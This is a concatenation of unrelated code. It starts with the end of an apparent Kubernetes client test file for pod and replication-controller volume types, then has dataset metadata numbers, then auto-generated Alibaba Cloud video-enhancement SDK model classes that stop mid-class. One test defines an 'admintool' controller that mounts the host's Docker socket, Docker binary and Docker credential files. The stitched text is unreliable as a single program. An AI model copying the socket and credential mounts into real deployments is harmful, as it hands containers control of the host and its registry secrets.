# --------------------------------------------------------------------------------- api - pod - gitRepo
def test_pod_git_repo(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container = _utils.create_container(name=container_name, image=container_image)
vol_name = "git-repo"
vol_type = "gitRepo"
repo = "https://user:pass@somewhere/repo.git"
revision = "e42d3dca1541ba085f34ce282feda1109a707c7b"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.git_repository = repo
volume.git_revision = revision
mount_name = vol_name
mount_path = '/test-git'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container.add_volume_mount(mount)
pod_name = "nginx-{0}".format(str(uuid.uuid4()))
pod = _utils.create_pod(name=pod_name)
pod.add_volume(volume)
pod.add_container(container)
if _utils.is_reachable(pod.config):
try:
pod.create()
volnames = [x.name for x in pod.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - rc - emptydir
def test_rc_emptydir(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
vol_name = "emptydir"
vol_type = "emptyDir"
volume = _utils.create_volume(name=vol_name, type=vol_type)
mount_name = vol_name
mount_path = '/test-emptydir'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "app"
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 1
if _utils.is_reachable(rc.config):
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - rc - hostpath
def test_rc_hostpath(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
vol_name = "hostpath"
vol_type = "hostPath"
hostpath = "/var/lib/docker"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.path = hostpath
mount_name = vol_name
mount_path = '/test-hostpath'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "app"
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 1
if _utils.is_reachable(rc.config):
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
def test_rc_hostpath_list(self):
volumes = [
{'hostPath': {'path': '/root/.dockercfg'}, 'name': 'dockercred'},
{'hostPath': {'path': '/usr/bin/docker'}, 'name': 'dockerbin'},
{'hostPath': {'path': '/var/run/docker.sock'}, 'name': 'dockersock'},
{'hostPath': {'path': '/root/.docker'}, 'name': 'dockerconfig'}
]
rc = _utils.create_rc(name="admintool")
for vol in volumes:
keys = list(filter(lambda x: x != 'name', vol.keys()))
v = K8sVolume(
name=vol['name'],
type=keys[0],
)
dico = vol[keys[0]]
if dico is not None:
v.path = dico['path']
rc.add_volume(v)
self.assertEqual(len(volumes), len(rc.volumes))
for i in range(0, len(volumes)):
self.assertEqual(volumes[i]['name'], rc.volumes[i].name)
self.assertEqual(volumes[i]['hostPath']['path'], rc.volumes[i].hostPath.path)
# --------------------------------------------------------------------------------- api - rc - secret
def test_rc_secret(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
secret_name = "yosecret"
secret = _utils.create_secret(name=secret_name)
k = ".secret-file"
v = "dmFsdWUtMg0KDQo="
secret.data = {k: v}
vol_name = "secret"
vol_type = "secret"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.secret_name = secret_name
mount_name = vol_name
mount_path = '/test-secret'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "app"
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 1
if _utils.is_reachable(rc.config):
secret.create()
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
# --------------------------------------------------------------------------------- api - rc - aws ebs
def test_rc_aws_ebs(self):
# http://kubernetes.io/docs/user-guide/volumes/#awselasticblockstore
# - the nodes on which pods are running must be AWS EC2 instances
# - those instances need to be in the same region and availability-zone as the EBS volume
# - EBS only supports a single EC2 instance mounting a volume
# Pod creation will timeout waiting for readiness if not on AWS; unschedulable.
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
volume_id = "vol-0e3056a2"
vol_name = "ebs"
vol_type = "awsElasticBlockStore"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.volume_id = volume_id
mount_name = vol_name
mount_path = '/test-aws'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "nginx-{0}".format(str(uuid.uuid4()))
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 3
if _utils.is_reachable(rc.config):
try:
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - rc - gce pd
def test_rc_gce_pd(self):
# http://kubernetes.io/docs/user-guide/volumes/#gcepersistentdisk
# - the nodes on which pods are running must be GCE VMs
# - those VMs need to be in the same GCE project and zone as the PD
# Pod creation will timeout waiting for readiness if not on GCE; unschedulable.
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
pd_name = "mnubo-disk1"
vol_name = "persistent"
vol_type = "gcePersistentDisk"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.pd_name = pd_name
volume.read_only = True # HTTP 422: GCE PD can only be mounted on multiple machines if it is read-only
mount_name = vol_name
mount_path = '/test-gce'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "nginx-{0}".format(str(uuid.uuid4()))
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 3
if _utils.is_reachable(rc.config):
try:
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - rc - nfs
def test_rc_nfs(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
vol_name = "nfs"
vol_type = "nfs"
server = "howard.mtl.mnubo.com"
path = "/fs1/test-nfs"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.nfs_server = server
volume.nfs_path = path
mount_name = vol_name
mount_path = '/test-nfs'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "nginx-{0}".format(str(uuid.uuid4()))
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 3
if _utils.is_reachable(rc.config):
try:
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
# --------------------------------------------------------------------------------- api - rc - gitRepo
def test_rc_git_repo(self):
container_name = "nginx"
container_image = "nginx:1.7.9"
container_nginx = _utils.create_container(name=container_name, image=container_image)
container_name = "redis"
container_image = "redis:3.0.7"
container_redis = _utils.create_container(name=container_name, image=container_image)
vol_name = "git-repo"
vol_type = "gitRepo"
repo = "https://user:pass@somewhere/repo.git"
revision = "e42d3dca1541ba085f34ce282feda1109a707c7b"
volume = _utils.create_volume(name=vol_name, type=vol_type)
volume.git_repository = repo
volume.git_revision = revision
mount_name = vol_name
mount_path = '/test-git'
mount = K8sVolumeMount(name=mount_name, mount_path=mount_path)
container_nginx.add_volume_mount(mount)
container_redis.add_volume_mount(mount)
rc_name = "nginx-{0}".format(str(uuid.uuid4()))
rc = _utils.create_rc(name=rc_name)
rc.add_volume(volume)
rc.add_container(container_nginx)
rc.add_container(container_redis)
rc.desired_replicas = 3
if _utils.is_reachable(rc.config):
try:
rc.create()
volnames = [x.name for x in rc.volumes]
self.assertIn(vol_name, volnames)
except Exception as err:
self.assertIsInstance(err, TimedOutException)
| 36.008163
| 111
| 0.593148
| 3,892
| 35,288
| 5.143628
| 0.062179
| 0.022728
| 0.04161
| 0.043159
| 0.845647
| 0.814876
| 0.780758
| 0.74749
| 0.71532
| 0.697587
| 0
| 0.013601
| 0.258275
| 35,288
| 979
| 112
| 36.044944
| 0.751242
| 0.09397
| 0
| 0.776913
| 0
| 0
| 0.079896
| 0.010116
| 0
| 0
| 0
| 0
| 0.128405
| 1
| 0.0869
| false
| 0.005188
| 0.020752
| 0
| 0.108949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6718a3aea8573133a9e43ad80c59db9fbf6e8c4b
| 31,163
|
py
|
Python
|
videoenhan-20200320/python/alibabacloud_videoenhan20200320/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
videoenhan-20200320/python/alibabacloud_videoenhan20200320/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
videoenhan-20200320/python/alibabacloud_videoenhan20200320/models.py
|
alibabacloud-sdk-swift/alibabacloud-sdk
|
afd43b41530abb899076a34ceb96bdef55f74460
|
[
"Apache-2.0"
] | null | null | null |
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
class ChangeVideoSizeRequest(TeaModel):
def __init__(self, video_url=None, width=None, height=None, crop_type=None, fill_type=None, tightness=None, r=None, g=None, b=None):
self.video_url = video_url
self.width = width
self.height = height
self.crop_type = crop_type
self.fill_type = fill_type
self.tightness = tightness
self.r = r
self.g = g
self.b = b
def validate(self):
self.validate_required(self.video_url, 'video_url')
self.validate_required(self.width, 'width')
self.validate_required(self.height, 'height')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['Width'] = self.width
result['Height'] = self.height
result['CropType'] = self.crop_type
result['FillType'] = self.fill_type
result['Tightness'] = self.tightness
result['R'] = self.r
result['G'] = self.g
result['B'] = self.b
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.width = map.get('Width')
self.height = map.get('Height')
self.crop_type = map.get('CropType')
self.fill_type = map.get('FillType')
self.tightness = map.get('Tightness')
self.r = map.get('R')
self.g = map.get('G')
self.b = map.get('B')
return self
class ChangeVideoSizeResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = ChangeVideoSizeResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class ChangeVideoSizeResponseData(TeaModel):
def __init__(self, video_url=None, video_cover_url=None):
self.video_url = video_url
self.video_cover_url = video_cover_url
def validate(self):
self.validate_required(self.video_url, 'video_url')
self.validate_required(self.video_cover_url, 'video_cover_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['VideoCoverUrl'] = self.video_cover_url
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.video_cover_url = map.get('VideoCoverUrl')
return self
class ChangeVideoSizeAdvanceRequest(TeaModel):
def __init__(self, video_url_object=None, width=None, height=None, crop_type=None, fill_type=None, tightness=None, r=None, g=None, b=None):
self.video_url_object = video_url_object
self.width = width
self.height = height
self.crop_type = crop_type
self.fill_type = fill_type
self.tightness = tightness
self.r = r
self.g = g
self.b = b
def validate(self):
self.validate_required(self.video_url_object, 'video_url_object')
self.validate_required(self.width, 'width')
self.validate_required(self.height, 'height')
def to_map(self):
result = {}
result['VideoUrlObject'] = self.video_url_object
result['Width'] = self.width
result['Height'] = self.height
result['CropType'] = self.crop_type
result['FillType'] = self.fill_type
result['Tightness'] = self.tightness
result['R'] = self.r
result['G'] = self.g
result['B'] = self.b
return result
def from_map(self, map={}):
self.video_url_object = map.get('VideoUrlObject')
self.width = map.get('Width')
self.height = map.get('Height')
self.crop_type = map.get('CropType')
self.fill_type = map.get('FillType')
self.tightness = map.get('Tightness')
self.r = map.get('R')
self.g = map.get('G')
self.b = map.get('B')
return self
class GenerateVideoRequest(TeaModel):
def __init__(self, file_list=None, scene=None, width=None, height=None, style=None, duration=None, duration_adaption=None, transition_style=None, smart_effect=None, puzzle_effect=None, mute=None):
self.file_list = []
self.scene = scene
self.width = width
self.height = height
self.style = style
self.duration = duration
self.duration_adaption = duration_adaption
self.transition_style = transition_style
self.smart_effect = smart_effect
self.puzzle_effect = puzzle_effect
self.mute = mute
def validate(self):
self.validate_required(self.file_list, 'file_list')
if self.file_list:
for k in self.file_list:
if k :
k.validate()
def to_map(self):
result = {}
result['FileList'] = []
if self.file_list is not None:
for k in self.file_list:
result['FileList'].append(k.to_map() if k else None)
else:
result['FileList'] = None
result['Scene'] = self.scene
result['Width'] = self.width
result['Height'] = self.height
result['Style'] = self.style
result['Duration'] = self.duration
result['DurationAdaption'] = self.duration_adaption
result['TransitionStyle'] = self.transition_style
result['SmartEffect'] = self.smart_effect
result['PuzzleEffect'] = self.puzzle_effect
result['Mute'] = self.mute
return result
def from_map(self, map={}):
self.file_list = []
if map.get('FileList') is not None:
for k in map.get('FileList'):
temp_model = GenerateVideoRequestFileList()
temp_model = temp_model.from_map(k)
self.file_list.append(temp_model)
else:
self.file_list = None
self.scene = map.get('Scene')
self.width = map.get('Width')
self.height = map.get('Height')
self.style = map.get('Style')
self.duration = map.get('Duration')
self.duration_adaption = map.get('DurationAdaption')
self.transition_style = map.get('TransitionStyle')
self.smart_effect = map.get('SmartEffect')
self.puzzle_effect = map.get('PuzzleEffect')
self.mute = map.get('Mute')
return self
class GenerateVideoRequestFileList(TeaModel):
def __init__(self, file_url=None, file_name=None, type=None):
self.file_url = file_url
self.file_name = file_name
self.type = type
def validate(self):
self.validate_required(self.file_url, 'file_url')
self.validate_required(self.file_name, 'file_name')
self.validate_required(self.type, 'type')
def to_map(self):
result = {}
result['FileUrl'] = self.file_url
result['FileName'] = self.file_name
result['Type'] = self.type
return result
def from_map(self, map={}):
self.file_url = map.get('FileUrl')
self.file_name = map.get('FileName')
self.type = map.get('Type')
return self
class GenerateVideoResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = GenerateVideoResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class GenerateVideoResponseData(TeaModel):
def __init__(self, video_url=None, video_cover_url=None):
self.video_url = video_url
self.video_cover_url = video_cover_url
def validate(self):
self.validate_required(self.video_url, 'video_url')
self.validate_required(self.video_cover_url, 'video_cover_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['VideoCoverUrl'] = self.video_cover_url
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.video_cover_url = map.get('VideoCoverUrl')
return self
class GetAsyncJobResultRequest(TeaModel):
def __init__(self, job_id=None):
self.job_id = job_id
def validate(self):
self.validate_required(self.job_id, 'job_id')
def to_map(self):
result = {}
result['JobId'] = self.job_id
return result
def from_map(self, map={}):
self.job_id = map.get('JobId')
return self
class GetAsyncJobResultResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = GetAsyncJobResultResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class GetAsyncJobResultResponseData(TeaModel):
def __init__(self, job_id=None, status=None, result=None, error_code=None, error_message=None):
self.job_id = job_id
self.status = status
self.result = result
self.error_code = error_code
self.error_message = error_message
def validate(self):
self.validate_required(self.job_id, 'job_id')
self.validate_required(self.status, 'status')
self.validate_required(self.result, 'result')
self.validate_required(self.error_code, 'error_code')
self.validate_required(self.error_message, 'error_message')
def to_map(self):
result = {}
result['JobId'] = self.job_id
result['Status'] = self.status
result['Result'] = self.result
result['ErrorCode'] = self.error_code
result['ErrorMessage'] = self.error_message
return result
def from_map(self, map={}):
self.job_id = map.get('JobId')
self.status = map.get('Status')
self.result = map.get('Result')
self.error_code = map.get('ErrorCode')
self.error_message = map.get('ErrorMessage')
return self
class SuperResolveVideoRequest(TeaModel):
def __init__(self, video_url=None, bit_rate=None):
self.video_url = video_url
self.bit_rate = bit_rate
def validate(self):
self.validate_required(self.video_url, 'video_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['BitRate'] = self.bit_rate
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.bit_rate = map.get('BitRate')
return self
class SuperResolveVideoResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = SuperResolveVideoResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class SuperResolveVideoResponseData(TeaModel):
def __init__(self, video_url=None):
self.video_url = video_url
def validate(self):
self.validate_required(self.video_url, 'video_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
return self
class SuperResolveVideoAdvanceRequest(TeaModel):
def __init__(self, video_url_object=None, bit_rate=None):
self.video_url_object = video_url_object
self.bit_rate = bit_rate
def validate(self):
self.validate_required(self.video_url_object, 'video_url_object')
def to_map(self):
result = {}
result['VideoUrlObject'] = self.video_url_object
result['BitRate'] = self.bit_rate
return result
def from_map(self, map={}):
self.video_url_object = map.get('VideoUrlObject')
self.bit_rate = map.get('BitRate')
return self
class EraseVideoLogoRequest(TeaModel):
def __init__(self, video_url=None, boxes=None):
self.video_url = video_url
self.boxes = []
def validate(self):
self.validate_required(self.video_url, 'video_url')
if self.boxes:
for k in self.boxes:
if k :
k.validate()
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['Boxes'] = []
if self.boxes is not None:
for k in self.boxes:
result['Boxes'].append(k.to_map() if k else None)
else:
result['Boxes'] = None
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.boxes = []
if map.get('Boxes') is not None:
for k in map.get('Boxes'):
temp_model = EraseVideoLogoRequestBoxes()
temp_model = temp_model.from_map(k)
self.boxes.append(temp_model)
else:
self.boxes = None
return self
class EraseVideoLogoRequestBoxes(TeaModel):
def __init__(self, h=None, w=None, x=None, y=None):
self.h = h
self.w = w
self.x = x
self.y = y
def validate(self):
pass
def to_map(self):
result = {}
result['H'] = self.h
result['W'] = self.w
result['X'] = self.x
result['Y'] = self.y
return result
def from_map(self, map={}):
self.h = map.get('H')
self.w = map.get('W')
self.x = map.get('X')
self.y = map.get('Y')
return self
class EraseVideoLogoResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = EraseVideoLogoResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class EraseVideoLogoResponseData(TeaModel):
def __init__(self, video_url=None):
self.video_url = video_url
def validate(self):
self.validate_required(self.video_url, 'video_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
return self
class EraseVideoLogoAdvanceRequest(TeaModel):
def __init__(self, video_url_object=None, boxes=None):
self.video_url_object = video_url_object
self.boxes = []
def validate(self):
self.validate_required(self.video_url_object, 'video_url_object')
if self.boxes:
for k in self.boxes:
if k :
k.validate()
def to_map(self):
result = {}
result['VideoUrlObject'] = self.video_url_object
result['Boxes'] = []
if self.boxes is not None:
for k in self.boxes:
result['Boxes'].append(k.to_map() if k else None)
else:
result['Boxes'] = None
return result
def from_map(self, map={}):
self.video_url_object = map.get('VideoUrlObject')
self.boxes = []
if map.get('Boxes') is not None:
for k in map.get('Boxes'):
temp_model = EraseVideoLogoAdvanceRequestBoxes()
temp_model = temp_model.from_map(k)
self.boxes.append(temp_model)
else:
self.boxes = None
return self
class EraseVideoLogoAdvanceRequestBoxes(TeaModel):
def __init__(self, h=None, w=None, x=None, y=None):
self.h = h
self.w = w
self.x = x
self.y = y
def validate(self):
pass
def to_map(self):
result = {}
result['H'] = self.h
result['W'] = self.w
result['X'] = self.x
result['Y'] = self.y
return result
def from_map(self, map={}):
self.h = map.get('H')
self.w = map.get('W')
self.x = map.get('X')
self.y = map.get('Y')
return self
class EraseVideoSubtitlesRequest(TeaModel):
def __init__(self, video_url=None, _bx=None, _by=None, _bw=None, _bh=None):
self.video_url = video_url
self._bx = _bx
self._by = _by
self._bw = _bw
self._bh = _bh
def validate(self):
self.validate_required(self.video_url, 'video_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['BX'] = self._bx
result['BY'] = self._by
result['BW'] = self._bw
result['BH'] = self._bh
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self._bx = map.get('BX')
self._by = map.get('BY')
self._bw = map.get('BW')
self._bh = map.get('BH')
return self
class EraseVideoSubtitlesResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = EraseVideoSubtitlesResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class EraseVideoSubtitlesResponseData(TeaModel):
def __init__(self, video_url=None):
self.video_url = video_url
def validate(self):
self.validate_required(self.video_url, 'video_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
return self
class EraseVideoSubtitlesAdvanceRequest(TeaModel):
def __init__(self, video_url_object=None, _bx=None, _by=None, _bw=None, _bh=None):
self.video_url_object = video_url_object
self._bx = _bx
self._by = _by
self._bw = _bw
self._bh = _bh
def validate(self):
self.validate_required(self.video_url_object, 'video_url_object')
def to_map(self):
result = {}
result['VideoUrlObject'] = self.video_url_object
result['BX'] = self._bx
result['BY'] = self._by
result['BW'] = self._bw
result['BH'] = self._bh
return result
def from_map(self, map={}):
self.video_url_object = map.get('VideoUrlObject')
self._bx = map.get('BX')
self._by = map.get('BY')
self._bw = map.get('BW')
self._bh = map.get('BH')
return self
class AbstractEcommerceVideoRequest(TeaModel):
def __init__(self, video_url=None, duration=None, width=None, height=None):
self.video_url = video_url
self.duration = duration
self.width = width
self.height = height
def validate(self):
self.validate_required(self.video_url, 'video_url')
self.validate_required(self.duration, 'duration')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['Duration'] = self.duration
result['Width'] = self.width
result['Height'] = self.height
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.duration = map.get('Duration')
self.width = map.get('Width')
self.height = map.get('Height')
return self
class AbstractEcommerceVideoResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = AbstractEcommerceVideoResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class AbstractEcommerceVideoResponseData(TeaModel):
def __init__(self, video_url=None, video_cover_url=None):
self.video_url = video_url
self.video_cover_url = video_cover_url
def validate(self):
self.validate_required(self.video_url, 'video_url')
self.validate_required(self.video_cover_url, 'video_cover_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['VideoCoverUrl'] = self.video_cover_url
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.video_cover_url = map.get('VideoCoverUrl')
return self
class AbstractEcommerceVideoAdvanceRequest(TeaModel):
def __init__(self, video_url_object=None, duration=None, width=None, height=None):
self.video_url_object = video_url_object
self.duration = duration
self.width = width
self.height = height
def validate(self):
self.validate_required(self.video_url_object, 'video_url_object')
self.validate_required(self.duration, 'duration')
def to_map(self):
result = {}
result['VideoUrlObject'] = self.video_url_object
result['Duration'] = self.duration
result['Width'] = self.width
result['Height'] = self.height
return result
def from_map(self, map={}):
self.video_url_object = map.get('VideoUrlObject')
self.duration = map.get('Duration')
self.width = map.get('Width')
self.height = map.get('Height')
return self
class AbstractFilmVideoRequest(TeaModel):
def __init__(self, video_url=None, length=None):
self.video_url = video_url
self.length = length
def validate(self):
self.validate_required(self.video_url, 'video_url')
self.validate_required(self.length, 'length')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['Length'] = self.length
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.length = map.get('Length')
return self
class AbstractFilmVideoResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = AbstractFilmVideoResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class AbstractFilmVideoResponseData(TeaModel):
def __init__(self, video_url=None):
self.video_url = video_url
def validate(self):
self.validate_required(self.video_url, 'video_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
return self
class AbstractFilmVideoAdvanceRequest(TeaModel):
def __init__(self, video_url_object=None, length=None):
self.video_url_object = video_url_object
self.length = length
def validate(self):
self.validate_required(self.video_url_object, 'video_url_object')
self.validate_required(self.length, 'length')
def to_map(self):
result = {}
result['VideoUrlObject'] = self.video_url_object
result['Length'] = self.length
return result
def from_map(self, map={}):
self.video_url_object = map.get('VideoUrlObject')
self.length = map.get('Length')
return self
class AdjustVideoColorRequest(TeaModel):
def __init__(self, video_url=None, video_bitrate=None, video_codec=None, video_format=None, mode=None):
self.video_url = video_url
self.video_bitrate = video_bitrate
self.video_codec = video_codec
self.video_format = video_format
self.mode = mode
def validate(self):
self.validate_required(self.video_url, 'video_url')
self.validate_required(self.mode, 'mode')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
result['VideoBitrate'] = self.video_bitrate
result['VideoCodec'] = self.video_codec
result['VideoFormat'] = self.video_format
result['Mode'] = self.mode
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
self.video_bitrate = map.get('VideoBitrate')
self.video_codec = map.get('VideoCodec')
self.video_format = map.get('VideoFormat')
self.mode = map.get('Mode')
return self
class AdjustVideoColorResponse(TeaModel):
def __init__(self, request_id=None, data=None):
self.request_id = request_id
self.data = data
def validate(self):
self.validate_required(self.request_id, 'request_id')
